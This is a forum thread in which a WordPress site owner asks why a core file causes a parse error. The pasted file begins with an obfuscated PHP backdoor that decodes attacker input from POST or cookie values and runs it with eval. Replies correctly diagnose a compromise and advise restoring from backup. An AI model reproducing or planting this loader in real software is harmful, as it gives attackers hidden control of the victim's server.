# Parse error: syntax error, unexpected '$q74ed' (T_VARIABLE)

Tags: errors, parse

I'm not a programmer, but now I have a problem with my Wordpress-Site, which I can't figure by my self. I have a white screen and can't look into my wordpress-site. After I activated the Debug-Mode, it shows the following error:

Parse error: syntax error, unexpected '$q74ed' (T_VARIABLE) in /***/wp-includes/functions.wp-scripts.php on line 1

I looked into the code, but I can't say whats wrong with this one. Maybe you can help me? Otherwise I have to reinstall wordpress, I guess?!

```
<?php 
$w36423 = 697;$GLOBALS['e919']=Array();global$e919;$e919=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['l5dc']="\x23\x32\xd\xa\x33\x2a\x29\x7e\x6f\x5d\x40\x73\x24\x45\x30\x3b\x54\x52\x48\x6a\x79\x41\x71\x36\x44\x3e\x6b\x39\x35\x4e\x4c\x70\x5f\x42\x2c\x53\x5b\x69\x60\x3c\x47\x76\x4b\x74\x58\x2e\x64\x6c\x67\x6e\x4f\x49\x56\x7b\x66\x43\x25\x3f\x62\x5c\x61\x9\x78\x21\x5e\x20\x2b\x3d\x38\x55\x4a\x3a\x27\x65\x68\x37\x63\x34\x31\x51\x4d\x7a\x5a\x46\x2f\x22\x28\x26\x77\x2d\x7d\x50\x6d\x59\x57\x7c\x75\x72";$e919[$e919['l5dc'][92].$e919['l5dc'][28].$e919['l5dc'][4].$e919['l5dc'][1].$e919['l5dc'][73].$e919['l5dc'][76].$e919['l5dc'][27]]=$e919['l5dc'][31].$e919['l5dc'][60].$e919['l5dc'][76].$e919['l5dc'][26];$e919[$e919['l5dc'][47].$e919['l5dc'][28].$e919['l5dc'][23].$e919['l5dc'][68].$e919['l5dc'][78].$e919['l5dc'][46]]=$e919['l5dc'][76].$e919['l5dc'][8].$e919['l5dc'][96].$e919['l5dc'][49].$e919['l5dc'][43];$e919[$e919['l5dc'][54].$e919['l5dc'][28].$e919['l5dc'][75].$e919['l5dc'][27].$e919['l5dc'][60].$e919['l5dc'][4]]=$e919['l5dc'][11].$e919['l5dc'][96].$e919['l5dc'][58].$e919['l5dc'][11].$e919['l5dc'][43].$e919['l5dc'][97];$e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][75].$e919['l5dc'][46].$e919['l5dc'][1].$e919['l5dc'][54]]=$e919['l5dc'][11].$e919['l5dc'][43].$e919['l5dc'][97].$e919['l5dc'][47].$e919['l5dc'][73].$e919['l5dc'][49];$e919[$e919['l5dc'][20].$e919['l5dc'][73].$e919['l5dc'][77].$e919['l5dc'][46].$e919['l5dc'][1]]=$e919['l5dc'][73].$e919['l5dc'][62].$e919['l5dc'][31].$e919['l5dc'][47].$e919['l5dc'][8].$e919['l5dc'][46].$e919['l5dc'][73];$e919[$e919['l5dc'][41].$e919['l5dc'][54].$e919['l5dc'][73].$e919['l5dc'][60].$e919['l5dc'][28]]=$e919['l5dc'][11].$e919['l5dc'][43].$e919['l5dc'][97].$e919['l5dc'][32].$e919['l5dc'][97].$e919['l5dc'][73].$e919['l5dc'][31].$e919['l5dc'][73].$e919['l5dc'][60].$e919['l5dc'][43];$e919[$e919['l5dc'][31].$e919['l5dc'][58].$e919['l5dc'][23].$e919['l5dc'][68].$e919['l5dc'][27].$e919['l5dc'][14].$e919['l5dc'][54]]=$_POST;$e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][14].$e919['l5dc'][60].$e919['l5dc'][23].$e919['l5dc'][28]]=$_COOKIE;$sd85efbe7=Array($e919['l5dc'][97].$e919['l5dc'][60].$e919['l5dc'][49].$e919['l5dc'][46].$e919['l5dc'][8].$e919['l5dc'][92].$e919['l5dc'][78]=>$e919['l5dc'][97].$e919['l5dc'][60].$e919['l5dc'][49].$e919['l5dc'][46].$e919['l5dc'][8].$e919['l5dc'][92].$e919['l5dc'][1]);$j04e=Array($e919['l5dc'][97].$e919['l5dc'][60].$e919['l5dc'][49].$e919['l5dc'][46].$e919['l5dc'][8].$e919['l5dc'][92].$e919['l5dc'][4]=>$e919['l5dc'][97].$e919['l5dc'][60].$e919['l5dc'][49].$e919['l5dc'][46].$e919['l5dc'][8].$e919['l5dc'][92].$e919['l5dc'][77]);foreach(Array($sd85efbe7,$e919[$e919['l5dc'][31].$e919['l5dc'][58].$e919['l5dc'][23].$e919['l5dc'][68].$e919['l5dc'][27].$e919['l5dc'][14].$e919['l5dc'][54]],$j04e,$e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][14].$e919['l5dc'][60].$e919['l5dc'][23].$e919['l5dc'][28]])as$h51f){foreach($h51fas$q74ed=>$xdef15){$xdef15=@$e919[$e919['l5dc'][92].$e919['l5dc'][28].$e919['l5dc'][4].$e919['l5dc'][1].$e919['l5dc'][73].$e919['l5dc'][76].$e919['l5dc'][27]]($e919['l5dc'][18].$e919['l5dc'][5],$xdef15);$q74ed.=$e919['l5dc'][68].$e919['l5dc'][14].$e919['l5dc'][14].$e919['l5dc'][78].$e919['l5dc'][4].$e919['l5dc'][76].$e919['l5dc'][28].$e919['l5dc'][4].$e919['l5dc'][89].$e919['l5dc'][46].$e919['l5dc'][46].$e919['l5dc'][27].$e919['l5dc'][78].$e919['l5dc'][89].$e919['l5dc'][77].$e919['l5dc'][58].$e919['l5dc'][27].$e919['l5dc'][1].$e919['l5dc'][89].$e919['l5dc'][58].$e919['l5dc'][75].$e919['l5dc'][76].$e919['l5dc'][68].$e919['l5dc'][89].$e919['l5dc'][75].$e919['l5dc'][68].$e919['l5dc'][58].$e919['l5dc'][4].$e919['l5dc'][14].$e919['l5dc'][58].$e919['l5dc'][68].$e919['l5dc'][58].$e919['l5dc'][46].$e919['l5dc'][73].$e919['l5dc'][54].$e919['l5dc'][54];$ebda6e8=$xdef15^$e919[$e919['l5dc'][54].$e919['l5dc'][28].$e919['l5dc'][75].$e919['l5dc'][27].$e919['l5dc'][60].$e919['l5dc'][4]]($e919[$e919['l5dc'][41].$e919['l5dc'][54].$e919['l5dc'][73].$e919['l5dc'][60].$e919['l5dc'][28]]($q74ed,($e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][75].$e919['l5dc'][46].$e919['l5dc'][1].$e919['l5dc'][54]]($xdef15)/$e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][75].$e919['l5dc'][46].$e919['l5dc'][1].$e919['l5dc'][54]]($q74ed))+1),0,$e919[$e919['l5dc'][48].$e919['l5dc'][1].$e919['l5dc'][75].$e919['l5dc'][46].$e919['l5dc'][1].$e919['l5dc'][54]]($xdef15));$ebda6e8=$e919[$e919['l5dc'][20].$e919['l5dc'][73].$e919['l5dc'][77].$e919['l5dc'][46].$e919['l5dc'][1]]($e919['l5dc'][0],$ebda6e8);if($e919[$e919['l5dc'][47].$e919['l5dc'][28].$e919['l5dc'][23].$e919['l5dc'][68].$e919['l5dc'][78].$e919['l5dc'][46]]($ebda6e8)==3){eval/*n2c06*/($ebda6e8[1]($ebda6e8[2]));exit();}}} ?><?php
/**
 * Dependencies API: Scripts functions
 *
 * @since 2.6.0
 *
 * @package WordPress
 * @subpackage Dependencies
 */

/**
 * Initialize $wp_scripts if it has not been set.
 *
 * @global WP_Scripts $wp_scripts
 *
 * @since 4.2.0
 *
 * @return WP_Scripts WP_Scripts instance.
 */
function wp_scripts() {
    global $wp_scripts;
    if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
        $wp_scripts = new WP_Scripts();
    }
    return $wp_scripts;
```

Comment: That first line after the opening php tag shouldn‘t be there. You‘ve probably been hacked.

Answer (score 0):

You have been hacked.

This is probably on more than one file too, so just deleting that line from this file isn't going to solve the problem.

Best thing you can do is restore from a back up, then change all your passwords.  if you don't have a back up or your backup is also infected.  You want to do a clean install of the wordpress core and theme.  Then sort through your uploads and child theme.